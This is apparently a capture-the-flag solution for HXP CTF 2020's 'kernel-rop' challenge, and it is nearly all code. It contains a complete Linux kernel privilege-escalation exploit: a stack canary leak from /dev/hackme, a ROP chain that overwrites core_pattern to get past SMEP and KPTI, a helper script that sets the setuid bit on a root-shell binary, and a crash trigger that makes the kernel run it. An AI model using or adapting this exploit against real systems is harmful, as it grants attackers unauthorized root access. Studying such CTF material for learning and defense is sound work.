[exploit_bypass_kpti_with_coredump] HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with coredump; no KASLR

evil

#!/bin/sh

mv /evilsu /tmp/evilsu
chmod u+s /tmp/evilsu
chmod 777 /evilsu

evilsu

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main() {
    puts("[*] trying to spawn root shell");
    setuid(0);
    setgid(0);
    system("/bin/sh");
    return 0;
}

exploit

#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

char *VULN_DRV = "/dev/hackme";
void spawn_shell();

int64_t global_fd = 0;
uint64_t cookie = 0;
uint8_t cookie_off = 16;

uint64_t user_cs, user_ss, user_rflags, user_sp;
uint64_t user_rip = (uint64_t) spawn_shell;
uint64_t pop_rdi_ret = 0xffffffff815f88ec;
uint64_t mov_rdi_rax_clobber_rsi140_pop1_ret = 0xffffffff816bf203;
uint64_t swapgs_pop1_ret = 0xffffffff8146d4e4;
uint64_t iretq = 0xffffffff819c68f6;
uint64_t core_pattern = 0xffffffff8211edc0;
uint64_t write_rax_into_rdi_ret = 0xffffffff818673e9;
uint64_t pop_rax_ret = 0xffffffff81004d11;


void open_dev() {
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[!] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}


void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak));
    uint64_t data = read(global_fd, leak, sizeof(leak));
    cookie = leak[cookie_off];
    printf("[+] found stack canary: 0x%lx @ index %d\n", cookie, cookie_off);
	if(!cookie) {
    	puts("[-] failed to leak stack canary!");
    	exit(-1);
    }
}


void spawn_shell() {
    puts("[+] returned to user land");
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] got root (uid = %d)\n", uid);
    } else {
        printf("[!] failed to get root (uid: %d)\n", uid);
        exit(-1);
    }
    puts("[*] spawning shell");
    system("/bin/sh");
    exit(0);
}


void save_userland_state() {
    puts("[*] saving user land state");
    __asm__(".intel_syntax noprefix;"
            "mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            ".att_syntax");
}


void overwrite_ret() {
    puts("[*] trying to run ROP chain and bypass KPTI with core_pattern");
    uint8_t sz = 35;
    uint64_t payload[sz];

    payload[cookie_off++] = cookie;
    payload[cookie_off++] = 0x0;
    payload[cookie_off++] = 0x0;
    payload[cookie_off++] = 0x0;
    payload[cookie_off++] = pop_rax_ret;
    payload[cookie_off++] = 0x6c6976652f7c; // rax: /evil
    payload[cookie_off++] = pop_rdi_ret;
    payload[cookie_off++] = core_pattern;
    payload[cookie_off++] = write_rax_into_rdi_ret; // overwrite core_pattern
    payload[cookie_off++] = swapgs_pop1_ret;
    payload[cookie_off++] = 0x0;
    payload[cookie_off++] = iretq;
    payload[cookie_off++] = user_rip;
    payload[cookie_off++] = user_cs;
    payload[cookie_off++] = user_rflags;
    payload[cookie_off++] = user_sp;
    payload[cookie_off++] = user_ss;

    uint64_t data = write(global_fd, payload, sizeof(payload));

    puts("[-] if you can read this we failed the mission :(");
}


int main(int argc, char **argv) {
    open_dev();
    leak_cookie();
    save_userland_state();
    overwrite_ret();

    return 0;
}

trigger

int main() {
    char *p = 0;
    *p = 1;
    return 0;
}